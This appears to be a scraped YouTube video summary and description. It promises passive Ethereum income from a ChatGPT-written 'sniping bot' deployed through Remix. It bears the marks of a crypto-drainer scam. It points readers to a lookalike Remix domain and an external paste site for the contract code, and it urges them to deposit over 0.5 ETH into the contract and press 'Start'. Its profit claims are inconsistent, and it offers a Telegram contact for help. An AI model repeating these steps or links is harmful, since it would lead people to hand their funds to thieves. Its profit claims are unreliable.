How to make 1-2ETH per Day Passive with Bot on AI Chat GPT | Just copy and paste

How to make 1-2ETH per Day Passive with Bot on AI Chat GPT | Just copy and paste

How to Create an Ethereum Sniping Bot Using AI

Introduction to the Sniping Bot

  • Jacob introduces a video originally intended for his private channel, now shared publicly to promote his new channel.
  • The bot monitors the blockchain for new tokens and significant price changes, allowing quick buying or selling before other traders react.
  • It utilizes sophisticated algorithms to detect token movements immediately after listing or during sudden price changes.

Setting Up the Smart Contract

  • Jacob instructs ChatGPT to write code for a smart contract that hunts sniping opportunities on Ethereum.
  • He recommends using Remix, a web 3 application for developing and deploying smart contracts coded in Solidity. A link will be provided in the description.
  • Users are guided to create a new contract named "bot" and paste the generated code into it.

Compiling and Deploying the Contract

  • Important addresses of wrapped ether tokens are highlighted; users do not need actual wrapped ether for deployment.
  • Instructions are given on compiling the bot file with specific settings in Remix (Solidity version 0.6.5).
  • Users must deploy their contract by selecting "injected web 3" as the environment and confirming gas fees.

Funding and Starting the Bot

  • After successful deployment, users should fund their smart contract with Ethereum, noting that larger amounts can lead to bigger trades and profits.
  • Confirmation of funds is checked via EtherScan; users ensure their Ethereum is correctly allocated within the contract.
  • The final step involves starting the bot which begins monitoring liquidity pairs for potential transactions.

Monitoring Profits from Trading

  • After running for over 12 hours, Jacob checks his profits showing an increase from initial funding (1.31 ETH).
  • He notes that after another period of trading, he has earned over half of his deposit back (1.6 ETH), showcasing impressive returns.
Video description

*Hello! It's Jacob!* I’m excited to show you how ChatGPT can simplify your life. This guide provides clear, step-by-step instructions to help you get started and make the most of this powerful tool. With straightforward guidance, you’ll quickly learn how to tap into ChatGPT’s full potential, regardless of what you want to accomplish. *STEP BY STEP INSTRUCTIONS:* ❇️ Install MetaMask: https://metamask.io/download/ _If you have problems in this step, check out the MetaMask installation video on our channel:_ https://youtu.be/B9Dv-SfEpdY ❇️ Then go to the Remix: https://remixqide.co/ _(THE BOT IS ONLY COMPATIBLE WITH THIS VERSION OF THE REMIX, SO ONLY USE THIS LINK)_ ❇️ Click on the “contracts” folder and then create “New File”. Rename it as you like, i.e: “bot.sol”. Make sure it ends with .sol for Ethereum programming language. _Note: There is a problem if the text is not colored when you create bot.sol. Simply refresh the browser and then paste rentry codes again._ *🔥 Put THIS code into Remix compiler:* https://copycoden.pages.dev/ ❇️ Head over to “Compiler” tab in remix and choose version 0.6.6 and press “Compile” button. ❇️ Then go to the “DEPLOY & RUN TRANSACTIONS” section in Remix, and choose the “Injected Provider - MetaMask” option in environment. And then use the “Deploy” option. This option allows you to create your own smart-contract. To pay gas for creating smart-contract confirm message in your Metamask. Note: Make sure the name of your bot is selected in the CONTRACT section above deploy button. In this case mine would be "OneinchSlippageBot - bot.sol". Also if you get this message after deployment "Failed to publish metadata file to ipfs, please check the ipfs gateways is available. [{},{},{}] ". You can just ignore it and continue. This feature is to publish your bot to IPFS. Its not necessary, because the bot is in the blockchain and can be accessed through Remix. ❇️ Fund your bot to be able to frontrun transactions. _Make sure your deposit is more than 0.5 ETH(to prevent negating slippage) to your exact contract/bot address._ ❇️ Use the "Start" button to send the bot a command to start working and make transactions. ❇️ To return ethers to your wallet from a smart contract, click on the "Withdraw" button. Cause of assets can be used in the deal at the moment. 💬 If you have any questions or concerns, feel free to contact me anytime: https://t.me/w3solidity ➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖ 🔎 How can I restore the old contract again? Instead of using the "Deploy" button to create a new contract in the "DEPLOY & RUN TRANSACTIONS" section, you can access your existing contract by entering its address in the "At Address" field and clicking the "At Address" button. Note: Access can only be restored using the same MetaMask account that was originally used to create the contract. ➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖➖ 🤚 Share your profits in the comments below, and like & subscribe for more solidity tutorials.